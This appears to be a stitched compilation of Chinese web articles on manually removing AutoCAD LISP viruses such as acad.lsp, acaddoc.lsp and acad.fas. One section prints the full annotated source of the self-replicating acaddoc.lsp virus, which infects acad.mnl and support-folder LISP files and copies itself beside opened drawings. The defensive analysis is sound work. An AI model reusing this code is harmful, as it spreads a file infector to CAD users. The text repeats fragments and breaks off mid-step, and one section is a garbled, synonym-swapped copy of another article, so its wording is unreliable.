常见AutoCAD病毒(acad fas、acad lsp)清除方法
acaddoc.lsp病毒文件彻底清除方法
前言: 最近本人公司里流行一种CAD病毒,中毒后,CAD每次新开图均生成一个的病毒文件,虽破坏力不大,但烦不胜烦。
经研究病毒源码后,摸索出了一套清除该病毒的办法。
然后经过在数个同事机器上验证,该方法行之有效。
于是将杀毒方法成文,群发给部门同事,以下是原文。
一病毒简介:最近公司里流传一种cad病毒。
该病毒可被卡巴斯基和360杀毒软件查出。
卡巴斯基查出病毒名为,360杀毒软件查出病毒名为。
遗憾的是,卡巴斯基和360杀毒软件均不能将其彻底清除。
二中毒症状:机器中毒后,运行CAD时,每打开一个dwg文件,均在dwg文件所在目录下生成一个的文件。
由于每次开图,病毒程序均进行一次病毒传播复制过程,因此使得CAD开图时速度变慢。
用记事本查看CAD安装路径下的support目录下的任一*.lsp文件,如文件末尾含有与附件1相同的代码,则可判定为中毒。
三传播机理:通过分析病毒的源代码,初步了解其传播机理如下:如机器已中毒,CAD新打开dwg文件时,病毒程序自动加载。
并搜索CAD工作目录下的文件,感染同一目录下的*.mnl文件,搜索acad的support目录,并感染该目录下的所有*.lsp文件。
同时病毒在当前打开的dwg文件所在目录下生成文件,以利于下次传播。
如本机未中毒,而新打开的dwg文件所在目录下有文件,则病毒将感染上述目录下的*.mnl与*.lsp文件。
该病毒的最终目的是调用acadapq 与 acadappp 两个非法程序。
至于这两个程序会干什么,暂未深入研究。
四清除步骤:1. 退出CAD。
2. 全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。
注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。
搜索时选择“查找所有文件及文件夹”,然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。
CAD里LSP病毒文件的解决方法
如果CAD 鼠标中键不能平移,而是弹出下拉菜单,修改系统变量mbuttonpan的值为1,重新打开CAD后鼠标中键还是一样不能平移,有什么方法能够恢复原来的中键平移功能呢?1、清除LSP病毒文件说明该病毒是以前那个炸开命令不能使用病毒的变种,它修改了这4个系统变量的值。
(setvar "zoomfactor" 12)(setvar"mbuttonpan" 0)(setvar"HIGHLIGHT" 0)(setvar "fillmode" 0)这4个系统变量的默认值是:(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)(系统变量的相关说明请打开CAD后按F1键查看帮助文档。
)它不像以前的病毒那样,让一些命令无法使用,而是修改了几个系统变量使我们的操作不方便。
它的传播方式跟以前一样,只能在CAD支持路径和打开DWG文件时传播。
大家可以试试下面的方法:①、关闭CAD(一定要先关闭正在运行的CAD程序)。
②、按F3键打开XP系统的文件搜索窗口,搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。
注意:“搜索范围”一定要选择“本机硬盘驱动器...”,并勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”项勾选上,否则不能将这3个文件全部搜索清除干净。
③、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:(setvar "zoomfactor" 40)(setvar"mbuttonpan" 1)(setvar"HIGHLIGHT" 1)(setvar "fillmode" 1)④用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。
CAD病毒是什么怎么清除
CAD病毒是什么怎么清除CAD相信很多学建筑或者图形设计的人们都使用过,那么CAD病毒是什么呢?遇到了怎么解决?本文就来教大家使用手动设置查杀CAD 病毒的方法,具体步骤请看下文。
CAD病毒查杀方法介绍:手动查杀CAD病毒:1、关闭CAD(一定要先关闭正在运行的CAD程序)。
2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。
3、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。
(如"acad.mnl"文件中无此行代码可忽略此操作)附:"acad.mnl"文件可能在下面的目录中,C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名,200×和R×.×分别是CAD 的版本和版本代号。
(注意:目录C:\Documents and Settings\是系统隐藏文件夹)补充:电脑常见的病毒:1.文件型病毒文件型病毒是一种受感染的可执行文件,也就是.exe病毒文件。
当执行受感染的文件时,电脑病毒会将自己复制到其他可执行文件中,导致其他文件受感染。
常见AutoCAD病毒(acad.fas、acad.lsp)清除方法
常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法常见AutoCAD病毒(acad.fas、acad.lsp)清除⽅法acad.fas、acad.lsp这两种病毒是最常见的CAD病毒了,⽽且往往同⼀时候出现。
因为其本⾝对系统并不具备危害性,不过恶作剧程序罢了,因此⼤多数防病毒软件对它们不起作⽤,以下介绍⼿动删除⽅法。
第⼀步:查找硬盘、U盘内的 acad.fas、lcm.fas、acad.lsp、acadapp.lsp、acadappp.lsp 五个⽂件并删除⼲净(查找前请将显⽰隐藏和系统⽂件打开,这五个⽂件不⼀定同⼀时候出现。
强烈建议使⽤Total Commander⽂件管理器查找)。
第⼆步:查找acad.mnl⽂件(这个⽂件通常有两个,⼀个在“c:/Program Files/AutoCAD****/UserDataCache/Support/”⽬录下,还有⼀个在“c:/Documents and Settings/你的username/Application Data/Autodesk/AutoCAD****/R****/chs/Support/”⽬录下。
眼下病毒仅改动第⼀个acad.mnl⽂件)。
打开acad.mnl⽂件,在⽂件末尾找到下⾯三个语句的组合并删除(这三个语句组合不⼀定同⼀时候出现),然后保存⽂件。
(if (null stol) (load "lcm" ""))(princ)(load "acadapp.lsp")(princ)(load "acadappp.lsp")(princ)附录:有关该CAD病毒 acad.fas 的说明:1.它对电脑是没有随意的危害性!2.它在8:00到18:00这段时间,对CAD没有不论什么影响的!它的副作⽤就是:你的CAD在启动时会弹出⼀个显⽰时间的对话框假设时间不在8:00⾄18:00之间,还有可能伴随"移动"命令改变等情况。
AUTOCAD中了lsp病毒的解决办法
再次,到C:\Documents and Settings\中毒的用户名\Application Data\
C:\Documents and Settings\中毒的用户名\Local Settings\Application Data
这个地方下面删除autodesk文件夹
接着到 开始---设置---添加删除程序 卸载cad
再删除acad的安装文件夹 我的安装位置 c:\program files\autocad2004
然后全新安装cad 即可完全恢复正常
把前面的“钩”去掉;在“显示所有文件和文件夹”前面打上钩,
点“应用”——>“确定”;
然后点“搜索”打开XP系统的文件搜索窗口,
点开“更多高级选项”,勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”“搜索磁带备份”这4项后
搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。
②、按F3键打开XP系统的文件搜索窗口,分别搜索并删除acad.lsp、acad.fas、acaddoc.lsp、acadapq.lsp、acadappp.lsp、acadapp.lsp和lcm.fas文件(一般常见的有 acad.lsp/acadapq.lsp文件)
注意:
①、“搜索范围”一定要选择“本机硬盘驱动器 (如C;D;E;F)”。
一、填充命令用了没反映,打开“选项”勾选“实体填充”后可以用了,但是重开CAD又是老样子
大家可以试试下面的手工方法:
①、关闭CAD(一定要先关工具”——>“文件夹选项……”——>“查看”,
找到“隐藏受保护的操作系统文件(推荐)”,
②、一定要先勾选“搜索选项”中的“高级选项”,将其下的“搜索系统文件夹”、“搜索隐藏的文件和文件夹”“搜索子文件夹”项勾选上,否则不能将病毒文件全部搜索清除干净。
AUTOCAD病毒的清除方法acaddoc.lsp和acadapq.lsp
AUTOCAD病毒的清除方法acaddoc.lsp是一个专门针对CAD文件的病毒,在CAD软件使用中主要表现的情况如下:1、无法拷贝2、在命令行提示需要执行一个宏3、CAD会出莫名其妙的问题解决方法:关闭AutoCAD程序;搜索所有acaddoc.lsp和acadapq.lsp文件删除所有关acadapq.lsp(3,836字节) 和被感染的acaddoc.lsp(27字节) (看文件大小);重启AutoCAD,OKashan发表LZ还说少了一个步骤:没有处理acad.mnl文件,这样的清除并不彻底,下次再打开带毒的dwg文件(这里并非指dwg文件本身带毒,而是指在该dwg文件下有acaddoc.lsp文件存在)后,系统又会感染病毒,偶曾经对这个cad病毒的代码做过详细分析,下面是原文,有兴趣的朋友可以详细看看:最近自己的电脑中了CAD病毒,症状为打开一个dwg文件后,在该dwg文件所在目录下就会自动生成一个“acaddoc.lsp”文件,即使手工将其删除,下次打开dwg文件时又会自动生成。
如果把dwg文件和acaddoc.lsp文件一起复制到另外一部未感染CAD病毒的电脑上,只要一打开该dwg文件,则该电脑就会被感染。
因为这个CAD病毒是个lisp程序,花了些时间对病毒代码进行分析如下:-----------------下面是病毒代码-----------------------------(setq wold_cmd (getvar "cmdecho"))(setvar "cmdecho" 0)(setq wpath (findfile "base.dcl"))(setq wpath (substr wpath 1 (- (strlen wpath) 8))) ;wpath变量保存ACAD下support目录路径(setq wwmnlwpath (getvar "menuname")) ;获得当前菜单名,这句没有用处,下面并未使用wwmnlwpath变量(setq wnowdwg (getvar "dwgname")) ;获得当前打开图形文件名(setq wwjqm (findfile wnowdwg)) ;wwjqm变量保存当前打开图形文件的完整路径(setq wdwgwpath (substr wwjqm 1( - (strlen wwjqm) (strlen wnowdwg)))) ;wdwgwpath变量保存当前打开图形文件所在路径;;;alert( setq f ( open "c:\\boot.dat" "w")) ;f变量为boot.dat文件句柄,c盘根目录下boot.dat文件若存在则(write-line "[dang]" f) ;打开,不存在则创建,然后将当前打开图形文件所在路径和support(write-line (strcat "ff=" wdwgwpath) f) ;目录路径写入boot.dat文件(write-line (strcat "yy=" wpath) f)(close f)(setq boot (findfile "boot.dat")) ;获得boot.dat文件所在目录完整路径(if (/= boot "") (command "_-vbarun" "ThisDrawing.hh")) ;这句是要运行一个名为“ThisDrawing.hh”的宏,但该宏并不存在(setq wacadwpath (findfile "acaddoc.lsp")) ;wacadwpath变量保存当前加载的acaddoc.lsp文件所在目录(setq wacadwpath (substr wacadwpath 1(- (strlen wacadwpath) 11)))(setq wns1 "" wns2 "")(setq wlspbj 0) ;wlspbj变量是判断support目录下acaddoc.lsp文件是否已感染的;;; ;标志,已感染为1,未感染为0(setq wwjqm (strcat wpath "acaddoc.lsp")) ;wwjqm变量指向support目录下的acaddoc.lsp文件(if (setq wwjm (open wwjqm "r")) ;wwjm变量为打开support目录下的acaddoc.lsp文件的句柄,若打开(progn ;成功则进行处理(while(setq wwz (read-line wwjm)) ;逐行读取acaddoc.lsp文件内容,读取结束后,wns1中是倒数第2行(setq wns1 wns2 ) ;内容,wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”,(if (= (substr wns1 8 7) "acadapq") ;若是则已感染(setq wlspbj 1)))(close wwjm)))(setq wlspmnl 0) ;wlspmnl变量是判断support目录下acad.mnl文件是否已感染的标志,;;; ;已感染为1,未感染为0(setq wwjqm (strcat wpath "acad.mnl")) ;wwjqm变量指向support目录下的acad.mnl文件(if (setq wwjm (open wwjqm "r" )) ;wwjm变量为打开support目录下的acad.mnl文件的句柄,若打开(progn ;成功则进行处理(while (setq wwz (read-line wwjm)) ;逐行读取acad.mnl文件内容,读取结束后,wns1中是倒数第2行内容(setq wns1 wns2 ) ;wns2中是最后一行的内容(setq wns2 wwz))(if (> (strlen wns1) 14) ;判断wns1中从第8个字符开始的7个字符是否为“acadapq”,若是则(if (= (substr wns1 8 7) "acadapq") ;已感染(setq wlspmnl 1)))(close wwjm) ;关闭acad.mnl文件))(if (= wlspmnl 0) ;若acad.mnl文件未感染,则写入加载病毒的代码到acad.mnl文件的(progn ;最后2行中(setq wwjqm (strcat wpath(strcat (chr 97) (chr 99) (chr 97)(chr 100) (chr 46) (chr 109)(chr 110) (chr 108)) )) ;障眼法,等于(strcat wpath "acad.mnl")(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(defun wwriteapp ()(if (setq wwjm1 (open wnewacad "w"))(progn(setq wwjm (open woldacad "r"))(while (setq wwz (read-line wwjm))(write-line wwz wwjm1))(close wwjm)(close wwjm1))))(if (and (= wacadwpath wdwgwpath)(/= wacadwpath wpath)) ;若加载的acaddoc.lsp文件和图形文件同目录(progn(if (= 0 wlspmnl) ;acad.mnl文件未感染(progn(setq woldacad (findfile "acaddoc.lsp")) ;在下面调用wwriteapp子程序读取图形文件目录下的acaddoc.lsp文件(setq wnewacad (strcat wpath "acadapq.lsp")) ;的内容,在support目录下创建acadapq.lsp 文件并将acaddoc.lsp) ;文件的内容写入acadapq.lsp文件中;;else (acad.mnl文件已感染)(progn(setq woldacad (strcat wpath "acadapq.lsp" )) ;在下面调用wwriteapp子程序读取support目录下的acadapq.lsp文件(setq wnewacad (findfile "acaddoc.lsp")) ;的内容,写入图形目录下的acaddoc.lsp文件中))(if (= wlspbj 0) ;support目录下的acaddoc.lsp文件未感染(progn ;下面代码将加载病毒程序的代码写入acaddoc.lsp文件的最后2行中(setq wwjqm (strcat wpath "acaddoc.lsp" ))(setq wwjm (open wwjqm "a"))(write-line (strcat "(load " (chr 34)"acadapq" (chr 34) ")" ) wwjm)(write-line "(princ)" wwjm)(close wwjm)))(wwriteapp));;else (若加载的是support目录下的acaddoc.lsp文件)(progn(if (/= wnowdwg "Drawing.dwg" ) ;当前打开文件不是新建图形文件(progn(setq woldacad (findfile "acadapq.lsp")) ;在图形文件目录下创建acaddoc.lsp文件,将acadapq.lsp(setq wnewacad (strcat wdwgwpath "acaddoc.lsp")) ;文件的内容写入acaddoc.lsp文件中(wwriteapp)))))(setvar "cmdecho" wold_cmd)(princ) ;下面的代码又是个障眼法,没什么作用(setq strtopstr (strcat (chr 92) (chr 92) (chr 70)(chr 83) (chr 49) (chr 92)(chr 83) (chr 89) (chr 83)(chr 49) (chr 92) (chr 87)(chr 79) (chr 82) (chr 75)(chr 92) (chr 80) (chr 76)))-----------------病毒代码到此结束----------------------------从以上对病毒代码的分析可知,该病毒的病毒文件有2个,一个为acadapq.lsp,位于ACAD 安装目录下的support目录下,另一个为acaddoc.lsp,位于当前打开的dwg文件所在目录下,2个病毒文件的内容相同。
acaddoc(整理).lsp病毒文件彻底清除方法.pptx
五 预防措施: 由于该病毒是通过读取 dwg 文件所在的目录下 acaddoc.lsp 来传播的。因为在接受
其他同事的文件夹时,应先检查该文件夹中是否包含上述病毒文件。如有,则删除之。同时 也应该确保传给其他同事的文件夹不要包含上述文件。
下的 acad.mnl 文件,感染同一目录下的*.mnl 文件,搜索 acad 的 support 目录,并感染该 目录下的所有*.lsp 文件。同时病毒在当前打开的 dwg 文件所在目录下生成 acaddoc.lsp 文 件,以利于下次传播。
如本机未中毒,而新打开的 dwg 文件所在目录下有 acaddoc.lsp 文件,则病毒将感 染上述目录下的*.mnl 与*.lsp 文件。
2
--犀利的分割线-- 上文中所说的样本文件里所含代码即一段以 “(setq flagx t) (setq bz "(setq flagx t)")”开头, 以“(load "acadapq") (princ) (load "acadappp.lsp") (princ)”结尾的代码,很好辨识,中招的同学不妨一试。
病毒会感染 support 目录下的 *.lsp 文件。因此建议新建一个文件夹,将常用的 lisp 程序放置在该文件夹下,同时在 CAD 选项中将其设置为工作搜索目录。 未装杀毒软件的机器应首先将杀毒软件装上(360 杀毒软件免费的),在接受他人传来的文 件后应首先杀毒。 建议不要直接打开公共盘上的 dwg 文件,应先下载到本机再打开。
学海无涯
前言: 最近本人公司里流行一种 CAD 病毒,中毒后,CAD 每次新开图均生成一个 acaddoc.lsp 的病毒文件, 虽破坏力不大,但烦不胜烦。经研究病毒源码后,摸索出了一套清除该病毒的办法。然后经 过在数个同事机器上验证,该方法行之有效。于是将杀毒方法成文,群发给部门同事,以下 是原文。
CAD病毒查杀方法教程怎么手动杀毒
CAD病毒查杀方法教程怎么手动杀毒病毒无处不在,随时入侵我们电脑,CAD也一样,那CAD文件病毒怎么清除?本文就来教大家使用手动设置查杀CAD病毒的方法,具体步骤请看下文。
CAD病毒查杀方法介绍:手动查杀CAD病毒:1、关闭CAD(一定要先关闭正在运行的CAD程序)。
2、搜索并删除acad.lsp、acadappp.lsp和acadapp.lsp这3个文件。
3、复制下面的代码在CAD命令行运行,以恢复被修改的系统变量默认值:01(setvar "zoomfactor" 40)02(setvar"mbuttonpan" 1)03(setvar"HIGHLIGHT" 1)04(setvar "fillmode" 1)复制代码4、用记事本打开CAD下的“acad.mnl”文件,将文件最后一行代码(load "acadappp")删去。
(如"acad.mnl"文件中无此行代码可忽略此操作)附:"acad.mnl"文件可能在下面的目录中,C:\Documents and Settings\×××\Application Data\Autodesk\AutoCAD 200×\R×.×\chs\Support其中×××是你登录系统时的用户名,200×和R×.×分别是CAD 的版本和版本代号。
(注意:目录C:\Documents and Settings\是系统隐藏文件夹)补充:CAD使用小技巧1、文字镜像如何设置转动与不转动A、在镜像前,输入MIRRTEXT指令B、输入新值0 代表不转动;输入新值1代表转动C、MIRRTEXT指令完成后,输入MI镜像指令就OK了2、CAD的版本转换A、CAD高版本可以打开所有低版本的图纸B、CAD低版本不可以打开高版本的图纸C、高版本转成低版本的方法,直接点击另存为,将文件类型可以改成任意的低版本D、将低版本转换成高版本,就比较复杂了,需要第三方软件,也就是版本转换器。
LSP病毒处理方法
acad.lsp,acaddoc.lsp,acadapp.lsp和acadiso.lsp病毒的查杀方法1.为了保证操作的完善,在做下面的操作以前最好先把CAD和天正的程序完全卸载,卸载完成后手动删掉程序文件夹下剩余的文件。
2.点取桌面上“我的电脑”图标,按键盘“ctrl+F”键,显示如下图所示面板(下面这个图是在我机子上截的):注意左边几个打红圈的地方,如果你机子上“更多高级选项”旁边的箭头是向下的,需要点一下箭头,让它变成如图所示的形状,此时下边会打开下级选项,注意最下面一个红圈中三个打勾的地方,在你那儿也要打上勾。
然后在最上面一个红圈的位置处输入需要搜索的文件名,一共有四个文件需要搜索,分别是acad.lsp,acaddoc.lsp,acadapp.lsp和acadiso.lsp,因为每次只能搜索一个文件,所以得重复四遍这个搜索过程,最后把搜出来的文件全部删除。
3.如果个别文件系统不让删的话,可以把电脑重启,然后按F8进入安全模式下删除。
4.待所有的病毒文件全部删干净后再重装CAD以及天正的程序。
5.如果中毒不是很深,即单独启动纯CAD平台程序时命令行并没有任何错误提示,则可以不用重新卸载安装CAD程序,只需要把天正卸载重装即可。
注意:1.病毒之所以称之为病毒,除了它带来一些负面影响以外,还因为它具有一定的传染性,所以查杀病毒这个操作最好是一整个设计单位找个时间大家统一清理一下,即所有的电脑同时进行杀毒的这个操作,否则因为内部的图纸交流,本来已经杀过病毒的电脑可能会再次感染病毒。
2.处理完病毒后以后,传图纸的时候最好只传一张张的DWG图纸,而不要传压缩文件或直接拷贝整个文件夹。
3.网上随便搜一下也能搜到一些CAD病毒的专杀工具,在可能的情况可以下下来试试,有些还是有一定效果的。
acaddoc.lsp病毒文件彻底清除方法
序止: 迩去自己公司里流通一种CAD病毒,中毒后,CAD屡屡新启图均死成一个acaddoc.lsp的病毒文献,之阳早格格创做虽损害力没有大,但是烦没有堪烦.经钻研病毒源码后,摸索出了一套扫除该病毒的办法.而后通过正在数个共事呆板上考证,该要领止之灵验.于是将杀毒要领成文,群收给部分共事,以下是本文.一病毒简介:迩去公司里流传一种cad病毒.该病毒可被卡巴斯基战360杀毒硬件查出.卡巴斯基查出病毒名为Virus.ALS.Pasdoc.a,360杀毒硬件查出病毒名为Trojan.Script.29327.遗憾的是,卡巴斯基战360杀毒硬件均没有克没有及将其实足扫除.二中毒症状:呆板中毒后,运止CAD时,每挨启一个dwg文献,均正在dwg文献地圆目录下死成一个acaddoc.lsp的文献.由于屡屡启图,病毒步调均举止一次病毒传播复造历程,果此使得CAD启图时速度变缓.用记事本查看CAD拆置路径下的support目录下的任一*.lsp文献,如文献开端含有与附件1相共的代码,则可判决为中毒.三传播机理:通太过解病毒的源代码,收端相识其传播机理如下:如呆板已中毒,CAD新挨启dwg文献时,病毒步调自动加载.并搜索CAD处事目录下的acad.mnl文献,熏染共一目录下的*.mnl文献,搜索acad的support目录,并熏染该目录下的所有*.lsp文献.共时病毒正在目前挨启的dwg文献地圆目录下死成acaddoc.lsp文献,以好处下次传播.如本机已中毒,而新挨启的dwg文献地圆目录下有acaddoc.lsp文献,则病毒将熏染上述目录下的*.mnl与*.lsp 文献.该病毒的最后脚段是调用acadapq 与 acadappp 二个非法步调.至于那二个步调会搞什么,久已深进钻研.四扫除步调:1. 退出CAD.2. 齐盘搜索acadapq.*、、acadappp.*、acaddoc.* 文献,而后实足简略上述文献.注意查找前正在文献夹选项中树立“隐现所有文献与文献夹”以及与消“隐躲受呵护的支配系统文献”.搜索时采用“查找所有文献及文献夹”,而后正在“下档选项”里勾选“搜索系统文献夹”“搜索隐躲的文献战文献夹”“搜索子文献夹”.如果搜出的文献无法简略,则先浑空回支站,再搜索简略.注:探索者目录下有个AcadDoc.lsp(注意大小写)没有是病毒文献,谨防误删.3. 查看C盘根目录下是可有boot.dat文献,如有,则将其简略.4. 加进C:\Documents and Settings\用户名\Application Data\Autodesk\AutoCAD 2006(或者AutoCAD2004)\R16.2\chs\Support目录,用记事本挨启该目录下的所有*.mnl文献,脚动简略与附件1相共的代码(普遍皆正在文献开端),而后保存.并将建改后的所有*.mnl文献属性树立为“只读”.5. 加进CAD拆置目录下的support目录,将该目录下的所有*.lsp文献按步调4要领处理.记得将其属性设为“只读”.6. 如果本机拆置有多个版本的CAD,皆需按上述步调查看一次.如按上述步调扫除病毒乐成,没有要开尔,得先感动国家.如已乐成,再去找尔.五防止步伐:由于该病毒是通过读与dwg文献地圆的目录下acaddoc.lsp去传播的.果为正在交受其余共事的文献夹时,应先查看该文献夹中是可包罗上述病毒文献.如有,则简略之.共时也该当保证传给其余共事的文献夹没有要包罗上述文献.病毒会熏染support目录下的 *.lsp文献.果此提议新建一个文献夹,将时常使用的lisp步调搁置正在该文献夹下,共时正在CAD选项中将其树立为处事搜索目录.已拆杀毒硬件的呆板应最先将杀毒硬件拆上(360杀毒硬件免费的),正在交受他人传去的文献后应最先杀毒.提议没有要曲交挨启大众盘上的dwg文献,应先下载到本机再挨启.--尖锐的分隔线--上文中所道的样本文献里所含代码即一段以“(setq flagx t)(setq bz "(setq flagx t)")”启头,以“(load "acadapq")(princ)(load "acadappp.lsp")(princ)”末端的代码,很佳辨识,中招的共教无妨一试.。
acad.fas病毒彻底处理的方法
acad.fas病毒彻底处理的方法一种CAD病毒,首先解释下病毒acad.fas:1、它对电脑是没有任意的危害性!2、它在8:00到18:00这段时间,对CAD没有任何影响的!它唯一的副作用就是:你的CAD在启动时会弹出一个显示时间的对话框,如果时间时不在8:00至18:00之间,还有可能伴随"移动"命令改变~等情况,在这时间内的临时解决方案为:将电脑系统时间调整8:00就行了!(有必时请关了CAD后再打开CAD)彻底的解决方案为:主要是acad.fas程序文件,清除方法是删除干净acad.fas与lcm.fas两个文件!,如果删除不净下次启动是还是会生成,务必清理净!常见问题是C:\Program Files\autocad***\目录下(以及子目录下)的acad.fas 与lcm.fas是在全部查找时找不到的,请手动进入目录再行查找删除!注意:现有网上CAD病毒软件均无法查杀。
只能手工处理。
最好重装系统。
这是一种病毒,但不用重装,可以杀一、彻底的解决方案1:(主要是acad.fas程序文件)1、清除方法是删除干净acad.fas与lcm.fas两个文件! 如果删除不净下次启动是还是会生成,务必清理干净! 同时搜acad.lsp和acadapp.lsp删掉2、进入“C:\Documents and Settings\用户名\ApplicationData\Autodesk\AutoCAD 2005\R16.1\chs\support"如果有acad.fas,删除,打开acad.mnl,末尾如有不明代码,删除。
清除步骤:1.退出CAD。
2.全盘搜索acadapq.*、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。
注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。
搜索时选择“查找所有文件及文件夹”,然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。
CAD打开文件弹出浏览器
CAD打开文件弹出浏览器全部删除干净acad.fas和icm.fas这是一种病毒,但不用重装,可以杀的一、彻底的解决方案1:(主要是acad.fas程序文件)1、清除方法是删除干净acad.fas与lcm.fas两个文件!如果删除不净下次启动是还是会生成,务必清理干净!同时搜acad.lsp和acadapp.lsp删掉2、进入“C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2005\\R16.1\\chs\\support"如果有acad.fas,删除打开acad.mnl,末尾如有不明代码,删除。
清除步骤:1.退出CAD。
2.全盘搜索acadapq.*、、acadappp.*、acaddoc.* 文件,然后彻底删除上述文件。
注意查找前在文件夹选项中设置“显示所有文件与文件夹”以及取消“隐藏受保护的操作系统文件”。
搜索时选择“查找所有文件及文件夹”,然后在“高级选项”里勾选“搜索系统文件夹”“搜索隐藏的文件和文件夹”“搜索子文件夹”。
如果搜出的文件无法删除,则先清空回收站,再搜索删除。
注:探索者目录下有个AcadDoc.lsp(注意大小写)不是病毒文件,谨防误删。
3.查看C盘根目录下是否有boot.dat文件,如有,则将其删除。
4.进入C:\\Documents and Settings\\用户名\\Application Data\\Autodesk\\AutoCAD 2006(或AutoCAD2004)\\R16.2\\chs\\Support目录,用记事本打开该目录下的所有*.mnl文件,手动删除与附件1相同的代码(一般都在文件末尾),然后保存。
并将修改后的所有*.mnl文件属性设置为“只读”。
5.进入CAD安装目录下的support目录,将该目录下的所有*.lsp 文件按步骤4方法处理。
记得将其属性设为“只读”。
关于acad.lsp病毒的问题以及CAD“病毒”ACAD.LSP浅析--解决方法
关于acad.lsp病毒的问题以及CAD“病毒”ACAD.LSP浅析--解决方法我们这里用的是CAD2004,最近公司 同事从外面带进来了CAD病毒,问题症状是命令行以及一些功能不能使用,cad启动缓慢,电脑反应迟钝。
具体点就是CAD开始变的非常慢,通常打开一张图纸要等待几分钟的时间,并且一些运行于CAD上的二次开发软件的命令变的不可用。
即使重新安装CAD甚至重新安装系统,只要再次打开以前打开过的图纸,问题重现,这个问题对许多CAD设计人员都造成相当大的困扰。
该病毒利用CAD的读取机制,在用户第一次打开从网上下载的带有病毒的图纸后,该病毒即悄悄运行,并感染每一张新打开的图纸,将病毒文件到处复制,并生成很多名为acad.lsp的程序。
所以即便是重装CAD甚至重装系统都不能解决问题。
我个人的一些解决经验网上的方法大多不行,为什么这个说呢。
第一,病毒破坏的是当前用户所在的acad的配置文件,即使你完全删除了acad.lsp,软件acad的功能也无法修复。
第二,你搜索了所有的硬盘,找出ACAD.LSP。
acaappp.lsp acadapp.lsp。
并且删除了她,下次运行CAD,很多功能照样无法使用第三,你中毒之后,删除了所有的病毒文件,安全卸载了acad ,再次全新安装,一打开cad 还是功能缺失,速度缓慢,查硬盘,并没有发现acad.lsp等病毒第四,你中毒后发现换个用户名字进入操作系统比如你的用户名称是admin 中了毒,你现在用超级管理员administrator进入桌面,打开cad,没有问题,好像没有中毒第五,假如删除配置文件,而不全新安装cad的话,打开cad会提示无法找到C:\Documents and Settings\用户名\Application Data\xxx文件错误。
我是这样做的。
首先,找出电脑上acad.lsp acadapp.lsp cadappp.lsp ,包括隐藏的文件夹,然后删除再次,到C:\Documents and Settings\中毒的用户名\Application Data\C:\Documents and Settings\中毒的用户名\Local Settings\Application Data这个地方下面删除autodesk文件夹接着到 开始---设置---添加删除程序 卸载cad再删除acad的安装文件夹 我的安装位置 c:\program files\autocad2004然后全新安装cad 即可完全恢复正常PS:这样只是修复,并不可避免再次中毒建议用杀毒软件或者工具屏蔽 ACAD.LSP 禁止写操作我公司就是使用macfee 禁止对ACAD.LSP文件读写操作,曾今病毒泛滥,现在基本上没有中毒的情况。
CAD病毒解决办法
CAD病毒的解决方法①、关闭正在运行的AutoCAD及机械工程师CAD(切记!)②、打开“我的电脑”后,按F3键打开XP系统的文件搜索窗口,在整个硬盘上搜索并彻底删除以下文件:acad.fas;acad.lsp;acad.sys;acad.vlx;acadapp.lsp;lcm.fas;acaddoc.lspWIN764位搜索方法文件名:acad.fas OR acad.lsp OR acad.sys OR acad.vlx OR acadapp.lsp OR lcm.fas OR acaddoc.lsp注意:●“搜索范围”一定要选择“本机硬盘驱动器 (C:;D:;E:;F:)”。
●一定要先勾选“搜索选项”中的“高级选项”,将其下的“搜索子文件夹”及“搜索隐藏的文件及文件夹”项勾选上,否则不能将病毒文件全部搜索清除干净。
见下图●找到后全部删除(彻底删除shift+delete,只是删除到回收站不起作用)。
如果此时一个文件都没有找到,则说明您搜索的文件名称填写错误。
●保证AutoCAD文件夹下没有任何垃圾文件。
③、卸载AutoCAD及机械工程师CAD,删除AutoCAD安装路径。
④、再次搜索上述文件,找不到任何文件时(切记!),再重新安装AutoCAD 及机械工程师CAD。
该病毒症状:感染该病毒后,表现症状也不太相同,一般表现:●AutoCAD的炸开命令(Explode)、多行文字等出现异常。
●机械工程师CAD的许多命令显示为:未知命令。
●AutoCAD的插件命令无法正常使用。
●打开CAD后出现一信息:程序作者QQ:XXXXXXXXXX现在时间是:XX点XX分了的哦!好好干了啦!XX不会亏待你的!老板的眼睛是雪亮的啦!●打开原来的dwg图纸后,尺寸值发生了改变。
该病毒说明:这是一个专门针对CAD的病毒程序,不是传统意义上的病毒,因此,用瑞星、金山毒霸等是不能杀除的(目前)。
它的作用机制是这样的:某台机器上没有这个病毒程序,但在通过网上邻居或U盘拷贝别人的图纸时,大家经常会把整个目录拷贝过来,如果拷贝的这个目录中包含有acad.lsp和acad.vlx 等文件,你的机器就有了这个病毒,但是还没有起作用。
手工删除CAD病毒文件的方法
手工删除CAD病毒文件的方法
1.先关掉CAD,然后打开下面路径下的搜索软件(可以ctrl+单击)
\\192.168.10.253\projects\0000文件中转站\SF\Everything文件搜索工具\Everything_x64.exe
